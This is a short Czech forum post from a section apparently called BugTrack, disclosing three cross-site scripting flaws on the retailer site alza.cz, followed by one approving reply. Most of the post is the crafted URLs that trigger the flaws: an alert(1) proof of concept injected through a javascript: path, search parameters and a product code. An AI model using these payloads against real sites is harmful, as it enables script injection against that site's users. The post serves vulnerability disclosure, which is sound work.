Multiple XSS na Alza.cz
BugTrack
| 1. Reflected XSS with user interaction (filter bypass):
[link]
alza.cz/Error500.aspx?scripterrorpath=javas cript:javascript:alert(1)
2. Dom based XSS with user interaction:
[link]
alza.cz/SearchAdvanced.asp?pg=1&CatId=0 &EXPS=a&EXPS=xss');alert(1);</sc ript>
^ Po otevreni kliknout na tlacitko Hledat
3. Dom based XSS!
[link]
alza.cz/kod/SAMO0130a;xss'-alert(1)-' (odpovědět) | Sinxteniyn | 92.222.79.* | 3.5.2017 18:24 |
|
|
|
re: Multiple XSS na Alza.cz | # |
| Hezké, moc hezké :) (odpovědět) | David1234 | 88.103.77.* | 6.5.2017 19:55 |
|
|
|